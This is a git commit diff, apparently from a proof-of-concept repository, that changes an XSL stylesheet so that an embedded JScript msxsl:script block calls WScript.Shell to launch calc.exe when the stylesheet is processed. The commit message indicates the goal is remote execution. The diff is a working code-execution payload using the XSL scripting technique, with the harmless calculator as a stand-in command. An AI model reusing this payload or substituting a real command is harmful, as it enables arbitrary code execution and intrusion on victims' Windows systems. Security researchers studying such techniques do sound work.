Hopefully this works remotely now
This commit is contained in:
@@ -5,7 +5,11 @@ xmlns:msxsl="urn:schemas-microsoft-com:xslt"
|
||||
xmlns:user="http://mycompany.com/mynamespace">
|
||||
|
||||
<msxsl:script language="JScript" implements-prefix="user">
|
||||
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c C:\Windows\System32\calc.exe");
|
||||
function xml(nodelist) {
|
||||
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||||
return nodelist.nextNode().xml;
|
||||
|
||||
}
|
||||
</msxsl:script>
|
||||
<xsl:template match="/">
|
||||
<xsl:value-of select="user:xml(.)"/>
|
||||
|
||||
Reference in New Issue
Block a user